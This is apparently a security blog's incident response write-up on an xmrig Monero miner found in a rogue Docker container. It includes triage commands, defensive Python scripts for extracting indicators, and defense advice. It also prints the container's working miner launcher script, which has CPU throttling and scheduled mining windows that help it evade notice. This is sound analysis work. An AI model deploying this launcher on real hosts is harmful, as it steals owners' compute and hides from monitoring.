XMR Monero Miner Trojan Incident Response and Analysis

Introduction

This incident response analysis details the discovery and handling of a Monero (XMR) cryptocurrency mining malware. The situation arose during a penetration test on the afternoon of the 26th, when elevated CPU usage (200%, i.e. two fully saturated cores) was observed on a jump server. A colleague promptly identified it as XMR mining, which prompted a closer look at, and this write-up of, the emergency response process, incident response being an area where expertise was still being built.

The proliferation of tutorials for XMR mining has unfortunately been exploited by malicious actors. They gain unauthorized access to servers by whatever means are available and deploy XMR mining malware. To keep both the access and the income, they typically establish backdoors by planting their own SSH public keys in authorized_keys and configure scheduled tasks (cron entries, systemd units, container restart policies) that relaunch the miner automatically, so the compromised server's resources are consumed continuously for mining.

The following sections outline the steps taken during the investigation and remediation.

A visual representation of the XMR mining malware's impact is provided below for context.

Initial Investigation

  1. As seen in the performance monitor, CPU utilization spiked to 200%. A quick check with the top command revealed a process named xmrig, the open-source Monero miner, which is the key indicator that identified the incident as XMR mining.

  2. The command ps aux | grep xmrig was used to inspect the running process and its command line arguments. The output showed:

    ./xmrig --coin=monero -o pool.supportxmr.com:3333 -u 89zqe5wQCDsML1xyYx7GxqDqR3DAizK6cXRsd7rXLLmyRCHaTFe6cDJA

    The parameters within the xmrig command are significant:

    • --coin=monero: Selects the coin, and with it the RandomX algorithm xmrig uses to mine Monero.
    • -o pool.supportxmr.com:3333: Specifies the mining pool address and port. Both are useful network indicators: outbound connections to pool hosts on typical stratum ports such as 3333 are worth alerting on.
    • -u 89zqe5wQCDsML1xyYx7GxqDqR3DAizK6cXRsd7rXLLmyRCHaTFe6cDJA: Indicates the attacker's wallet address, where the mining proceeds are directed. A Monero address is 95 characters long, so the value as captured above is truncated. The full address is the best pivot for attribution, since pool dashboards generally expose per-address hashrate and worker counts that show how many other hosts feed the same wallet.
  3. The executable associated with the process was identified using ls -l /proc/[PID]/exe (or readlink -f /proc/[PID]/exe), where [PID] represents the process ID (e.g., 643961). If the link target ends in "(deleted)", the miner removed its own binary after starting; the file can still be preserved for analysis by copying /proc/[PID]/exe before the process is killed.

  4. Files opened by the process were examined with lsof -p [PID], which also lists the working directory, the loaded binary and the TCP socket to the pool.

  5. An attempt to terminate the process using kill -9 [PID] was made. However, the process re-emerged shortly after termination, indicating a persistence mechanism, assumed at that point to be a scheduled task. Killing a miner before its launcher has been found is a common misstep: the process simply returns, and each kill costs time. Locating the launcher first and stopping it, then the miner, avoids the loop.

  6. While initial checks for standard cron jobs (crontab -l for each user, /etc/cron*, /var/spool/cron) yielded no results, further investigation revealed that the process was running inside a Docker container. Container processes appear in the host's top and ps output like any other, but /proc/[PID]/cgroup names the container they belong to, and docker ps maps that ID to an image. An additional, unauthorized container was discovered this way.

    The container ran the image pmietlicki/monero-miner, a public image built around xmrig that ships the miner and its launcher configuration, so mining can be started with a single docker run.

  7. Executing docker stop [container_id] halted the rogue container. Subsequently, the top command confirmed that CPU usage had returned to normal levels.

    The container and its image were then removed with Docker commands (docker rm, docker rmi). Exporting the container first (docker export) preserves the sample and its configuration for later analysis. Although a global search for and deletion of xmrig files produced some errors, this did not impede the remediation. The initial phase of the mining malware incident response was concluded with the miner gone; the question that remained open, and that determines whether the attacker still has a way back in, was how the container came to be created on the host.
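The checks above (read the command line, resolve the binary, find out what launched the process) can be scripted so they run in one pass over every process on the host. The following is an added example written for this write-up, not code from the original post or from xmrig: it pulls pool, wallet and coin out of an xmrig argument vector in any of the flag spellings xmrig accepts, reads /proc/[PID]/cgroup to tell a container process from a host process, and sweeps /proc for miner-like command lines. The argument vector, container ID and cgroup text in the sample data are constructed for the example, and the wallet is a placeholder.

```python
"""Triage helpers for a suspected xmrig process on a Linux host.

Added example for this write-up, not code from the original post or from xmrig.
SAMPLE_ARGV, SAMPLE_CID and the SAMPLE_CGROUP_* strings are constructed; the
wallet in SAMPLE_ARGV is a placeholder, not a real address.
"""
import os
import re
from typing import Any, Dict, List, Optional, Tuple

# (short flag, long flag, IOC name) for the xmrig options worth pivoting on.
_XMRIG_OPTS = [
    ("-o", "--url", "pool"),
    ("-u", "--user", "wallet"),
    ("-p", "--pass", "password"),
    (None, "--coin", "coin"),
    (None, "--max-cpu-usage", "max_cpu"),
    (None, "--donate-level", "donate_level"),
]

# cgroup v1 places container processes under ".../docker/<id>", the cgroup v2 /
# systemd layout under ".../docker-<id>.scope"; the id is 64 hex characters.
_CGROUP_ID = re.compile(r"docker[/-]([0-9a-f]{64})")


def xmrig_iocs(argv: List[str]) -> Dict[str, str]:
    """Extract pool, wallet, coin etc. from an xmrig argument vector.

    Handles both "-o host:port" / "--url host:port" and "--url=host:port".
    """
    iocs: Dict[str, str] = {}
    i = 0
    while i < len(argv):
        arg = argv[i]
        for short, long_, name in _XMRIG_OPTS:
            if arg == short or arg == long_:
                if i + 1 < len(argv):        # value is the next argument
                    iocs[name] = argv[i + 1]
                    i += 1
                break
            if arg.startswith(long_ + "="):  # value is inline after '='
                iocs[name] = arg.split("=", 1)[1]
                break
        i += 1
    return iocs


def split_pool(pool: str) -> Tuple[str, Optional[int]]:
    """Split "host:port" (optionally prefixed by a stratum+tcp:// scheme) into host and port."""
    host_port = pool.split("://", 1)[-1]
    host, sep, port = host_port.rpartition(":")
    if sep and port.isdigit():
        return host, int(port)
    return host_port, None


def container_id_from_cgroup(cgroup_text: str) -> Optional[str]:
    """Return the Docker container ID named in /proc/<pid>/cgroup, or None for a host process."""
    m = _CGROUP_ID.search(cgroup_text)
    return m.group(1) if m else None


def is_miner_like(argv: List[str]) -> bool:
    """Cheap sweep heuristic: the xmrig binary name, xmrig-style flags, or a stratum URL."""
    joined = " ".join(argv)
    return re.search(r"xmrig|stratum\+tcp://|--donate-level|--coin=", joined) is not None


def triage_pid(pid: int) -> Dict[str, Any]:
    """Collect exe path, argument vector, IOCs and container membership for a live PID.

    /proc/<pid>/exe keeps resolving after the binary is unlinked (readlink then
    shows " (deleted)"), so the sample can still be copied from it.
    """
    proc = f"/proc/{pid}"
    with open(f"{proc}/cmdline", "rb") as f:
        argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
    with open(f"{proc}/cgroup") as f:
        cgroup = f.read()
    try:
        exe = os.readlink(f"{proc}/exe")
    except OSError:
        exe = None
    return {"pid": pid, "exe": exe, "argv": argv,
            "iocs": xmrig_iocs(argv), "container": container_id_from_cgroup(cgroup)}


def sweep_procfs() -> List[Dict[str, Any]]:
    """Triage every process on this host whose command line looks like a miner."""
    hits = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            info = triage_pid(int(entry))
        except OSError:          # process exited or its /proc entry is unreadable
            continue
        if is_miner_like(info["argv"]):
            hits.append(info)
    return hits


# Constructed sample data mirroring the shape of the command line seen in the incident.
SAMPLE_ARGV = ["./xmrig", "--coin=monero", "-o", "pool.supportxmr.com:3333",
               "-u", "4EXAMPLEwalletNotReal", "-p", "x", "--max-cpu-usage=50"]
SAMPLE_CID = "0123456789abcdef" * 4
SAMPLE_CGROUP_V2 = f"0::/system.slice/docker-{SAMPLE_CID}.scope\n"
SAMPLE_CGROUP_V1 = f"12:cpu,cpuacct:/docker/{SAMPLE_CID}\n1:name=systemd:/docker/{SAMPLE_CID}\n"
SAMPLE_CGROUP_HOST = "0::/user.slice/user-1000.slice/session-3.scope\n"

if __name__ == "__main__":
    print("sample IOCs:", xmrig_iocs(SAMPLE_ARGV), split_pool("pool.supportxmr.com:3333"))
    print("sample container:", container_id_from_cgroup(SAMPLE_CGROUP_V2))
    for hit in sweep_procfs():          # live sweep of this host
        print(hit["pid"], hit["exe"], hit["container"], hit["iocs"])
```

Run as root so that /proc/[PID]/exe resolves for every process; a hit with a non-empty container field is the case seen here, and docker ps --no-trunc matches the 64-character ID to the running container.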

Malware Sample Analysis

A global search using find / -name xmrig was performed to locate the malware's storage directory. For a container, the files live in the image's layers under Docker's storage directory on the host (typically /var/lib/docker/overlay2), which is why a host-side find locates them. The malicious sample was discovered and copied off the server for deeper analysis.

Examination of the directory's contents revealed a collection of files related to the malware, among them the launcher script reproduced below:

#!/bin/bash
algoMode=$1
poolUrl=$2
poolUser=$3
poolPW=$4
maxCpu=$5
useScheduler=$6 # true / false
startTime=$7 #e.g. 1530 or 1100 for time
stopTime=$8 #e.g. 1530 or 1100 for time
days=$9 #e.g. "Tuesday,Friday"
options=${10}
miner="./xmrig"
if [ "$maxCpu" != "100" ] && [ "$maxCpu" != "50" ] && [ "$maxCpu" != "25" ] && [ "$maxCpu" != "12.5" ] && [ "$maxCpu" != "6.25" ] ; then
    echo "maxCpu is not valid"; exit;
fi;
if [ "$useScheduler" != "true" ] && [ "$useScheduler" != "false" ]; then
    echo "useScheduler is not valid, use true or false"; exit;
fi;
if ! [[ ${poolUrl} =~ .+\.[a-z]+\:[0-9]+ ]]; then
    echo "The URL Format seams not right."; exit;
fi;
if [ "$useScheduler" == "true" ]; then
        if [ ${#startTime} -ne 4 ]; then
                echo "startTime is not in a valid format"; exit;
        fi;
        if [[ ${startTime} =~ [A-Za-z_\;\:\.]+ ]]; then
            echo "startTime can only contain digits"; exit;
        fi;
        if [ ${#stopTime} -ne 4 ]; then
                echo "stopTime is not in a valid fromat"; exit;
        fi;
        if [[ ${stopTime} =~ [A-Za-z_\;\:\.]+ ]]; then
            echo "stoptimeTime can only contain digits"; exit;
        fi;
        IFS=',' read -r -a dayArray <<< "$days"
        for day in "${dayArray[@]}"
    do
        if [ "${day,,}" != "monday" ] && [ "${day,,}" != "tuesday" ] && [ "${day,,}" != "wednesday" ] && [ "${day,,}" != "thursday" ] && [ "${day,,}" != "friday" ] && [ "${day,,}" != "saturday" ]  && [ "${day,,}" != "sunday" ]; then
                echo "Days are not formated correctley."; exit;
        fi;
    done
        # wait for starttime
        echo "================================================================";
        echo "Cryptonote mining container based on xmrig";
        echo "with task scheduling mod by MasterRoshi";
        echo  "";
        echo "Scheduler information";
        echo "At: $startTime - $stopTime GMT+0";
        echo "On: $days";
        echo "================================================================";
        echo "Waiting for the next work schedule....";
        while { printf -v current_day '%(%A)T' -1 && [[ ${days,,} != *"${current_day,,}"* ]]; } || { printf -v current_time '%(%H%M)T' -1 && [[ ${current_time} != ${startTime} ]]; }; do
                sleep 10;
        done;
        echo "Time to work, miner is signing-on!";
        # run xmrig as background
        $miner --coin="$algoMode" -o "$poolUrl" -u "$poolUser" -p "$poolPW" --max-cpu-usage="$maxCpu" "${options:---donate-level=3 -k}" &
        while printf -v current_time '%(%H%M)T' -1 && [[ $current_time != $stopTime ]]; do
                sleep 10;
        done;
        # end the xmring when the stoptime is reached
        pkill xmrig;
        echo "Miner signing-off and preparing for  the next work schedule!";
        "$0" "$algoMode" "$poolUrl" "$poolUser" "$poolPW" "$maxCpu" "$useScheduler" "$startTime" "$stopTime" "$days" "${options:---donate-level=3 -k}";
        exit;
else
         $miner --coin="$algoMode" -o "$poolUrl" -u "$poolUser" -p "$poolPW" --max-cpu-usage="$maxCpu" "${options:---donate-level=3 -k}";
fi;

Analysis of this script shows it to be the container's launcher: a wrapper around xmrig (the banner calls it a "Cryptonote mining container based on xmrig" with a scheduling mod credited to MasterRoshi) designed for execution on Linux. Its ten positional parameters are:

  • algoMode: Passed to xmrig as --coin; the coin to mine (monero in this incident), which selects the mining algorithm.
  • poolUrl: The mining pool host and port. The script only checks that it looks like host.tld:port.
  • poolUser: The pool username, which for Monero pools is the wallet address that receives the proceeds.
  • poolPW: The pool password, usually a worker name or a placeholder such as x.
  • maxCpu: The CPU cap passed as --max-cpu-usage; only 100, 50, 25, 12.5 or 6.25 are accepted. Running below 100% is a deliberate evasion option: a throttled miner does not produce the obvious spike seen in this incident.
  • useScheduler: A boolean flag (true/false) to enable time-window scheduling.
  • startTime: If scheduling is enabled, the start time in HHMM 24-hour format (e.g., 1530), read from the container's clock, which the banner states is GMT+0.
  • stopTime: If scheduling is enabled, the stop time in the same format (e.g., 1100).
  • days: If scheduling is enabled, the days of the week on which to mine (e.g., "Tuesday,Friday"); the check is a case-insensitive substring match against this list.
  • options: Extra xmrig parameters, defaulting to --donate-level=3 -k. Because the default is expanded inside double quotes, it reaches xmrig as a single argument rather than two.

When useScheduler is true, the script polls every 10 seconds until the current day name appears in days and the clock reads exactly startTime, launches xmrig in the background, polls until the clock reads stopTime, runs pkill xmrig, and re-executes itself with the same arguments to wait for the next window. Because the start check is an exact match on the minute, a container started after startTime waits until the next listed day. If useScheduler is false, xmrig runs in the foreground immediately and continuously. The scheduling mode matters for detection: mining confined to nights or weekends produces intermittent CPU spikes that look like batch jobs on a monitoring dashboard.
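Once the container is stopped, its launch parameters survive in the container metadata: docker inspect reports the arguments given after the entrypoint as Config.Cmd, which map one-to-one onto the positional parameters above. The following is an added example written for this write-up, not code from the original post or from the miner image. It recovers the pool, wallet and schedule from a constructed docker inspect record (the entrypoint path and the wallet in it are placeholders) and answers whether the miner would be active at a given time, so CPU graphs can be correlated with the schedule. The window calculation models the script's steady state; it does not reproduce the exact-minute start match, so a container launched after startTime is treated as though it had started on time.

```python
"""Recover the miner's schedule and pool settings from a docker inspect record.

Added example for this write-up, not code from the original post or from the
miner image. SAMPLE_INSPECT is constructed; it follows the docker inspect JSON
layout (a list of records with Config.Entrypoint / Config.Cmd), and the
entrypoint path and wallet in it are placeholders.
"""
import json
from datetime import datetime, timedelta
from typing import Dict, List

# Positional parameters of the launcher script, in the order it reads them ($1 .. ${10}).
PARAMS = ["algoMode", "poolUrl", "poolUser", "poolPW", "maxCpu",
          "useScheduler", "startTime", "stopTime", "days", "options"]

SAMPLE_INSPECT = json.dumps([{
    "Id": "0123456789abcdef" * 4,
    "Config": {
        "Image": "pmietlicki/monero-miner",
        "Entrypoint": ["/bin/bash", "/entrypoint.sh"],      # placeholder path
        "Cmd": ["monero", "pool.supportxmr.com:3333", "4EXAMPLEwalletNotReal", "x",
                "50", "true", "2200", "0600",
                "Monday,Tuesday,Wednesday,Thursday,Friday", ""],
    },
}])


def miner_config_from_inspect(inspect_json: str) -> Dict[str, str]:
    """Map the container's Config.Cmd (the arguments after the entrypoint)
    onto the script's parameter names. docker inspect returns a list, so the
    first record is taken."""
    record = json.loads(inspect_json)[0]
    cmd: List[str] = record["Config"].get("Cmd") or []
    return dict(zip(PARAMS, cmd))


def mining_window_active(cfg: Dict[str, str], when: datetime) -> bool:
    """Would xmrig be running at `when` (container clock, GMT+0 per the banner)?

    Scheduler branch: xmrig runs from startTime on a listed day until stopTime;
    a window that crosses midnight (stop < start) continues into the next
    morning. The non-scheduler branch mines continuously.
    """
    if cfg.get("useScheduler", "false").lower() != "true":
        return True
    days = {d.strip().lower() for d in cfg["days"].split(",")}
    start, stop = int(cfg["startTime"]), int(cfg["stopTime"])
    now = when.hour * 100 + when.minute
    today = when.strftime("%A").lower()
    if start <= stop:
        return today in days and start <= now < stop
    yesterday = (when - timedelta(days=1)).strftime("%A").lower()
    return (today in days and now >= start) or (yesterday in days and now < stop)


def active_at(cfg: Dict[str, str], iso_timestamp: str) -> bool:
    """Convenience wrapper taking an ISO 8601 timestamp such as "2024-06-18T23:30"."""
    return mining_window_active(cfg, datetime.fromisoformat(iso_timestamp))


if __name__ == "__main__":
    cfg = miner_config_from_inspect(SAMPLE_INSPECT)
    for name in PARAMS:
        print(f"{name:>12}: {cfg.get(name, '')!r}")
    for ts in ("2024-06-18T12:00", "2024-06-18T23:30", "2024-06-19T03:00", "2024-06-23T03:00"):
        print(ts, "mining" if active_at(cfg, ts) else "idle")
```

With the sample configuration (weeknights 22:00 to 06:00) a Tuesday-noon CPU spike could not be this miner, while a 03:00 Wednesday spike fits the window that opened on Tuesday evening; the same check applied to the real record from docker inspect [container_id] tells which CPU graph anomalies the container can and cannot explain.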

Remediation and Defense Recommendations

XMR mining malware is a type of malicious software that exploits the computational resources of infected computers to mine Monero (XMR) cryptocurrency without the user's explicit consent. The following measures are recommended for mitigating and defending against such threats:

  1. Timely System Updates: Ensure operating systems, applications, and security patches are consistently updated to minimize exposure to known vulnerabilities.
  2. Install Reputable Security Software: Deploy robust antivirus, anti-malware, and firewall solutions. Conduct regular full system scans and maintain real-time protection.
  3. Exercise Caution with Software Downloads: Obtain software exclusively from official and trusted sources. Carefully review and approve any requested permissions during installation.
  4. Strengthen Remote Access Security: Disable or restrict unnecessary remote access services (e.g., SSH exposed to the internet, RDP). Implement strong passwords and multi-factor authentication for all remote access points, and review authorized_keys files for keys nobody recognizes, since a planted SSH key is the usual persistence backdoor for mining crews.
  5. Monitor System Activity: Actively monitor system logs, network traffic, and process behaviors to detect anomalies and unusual resource consumption patterns. On hosts running Docker, include docker ps -a and docker images in the review: a container's processes show up in host tools such as top, but the container itself is only visible through the Docker CLI, as this incident showed.
  6. Prevent Unauthorized Mining Scripts: Utilize browser extensions or script-blocking tools (e.g., NoScript, AdBlock Plus) to prevent malicious websites from executing mining scripts in the browser.
  7. Enhance Network Security: Enforce strong, unique passwords. Implement network firewalls, restrict access to sensitive ports and services (including the Docker daemon socket and API, which must never be reachable from the network), and block or alert on outbound connections to known mining pools and typical stratum ports.
  8. Regular Data Backups: Perform frequent backups of critical data and store them securely offline to safeguard against data loss or ransomware encryption.
  9. Educate Users: Provide security awareness training to educate employees and users on identifying and avoiding malware threats.
  10. Prompt Incident Response and Isolation: If an XMR mining malware infection is detected, immediately disconnect the affected system from the network and seek professional assistance for thorough cleanup and system restoration.

Disclaimer: While these measures significantly enhance system security, no security solution is entirely foolproof. Continuous vigilance and regular security assessments are crucial for maintaining the integrity of systems and data.

Tags: XMR Monero cryptocurrency mining malware trojan

Posted on 16 June at 03:02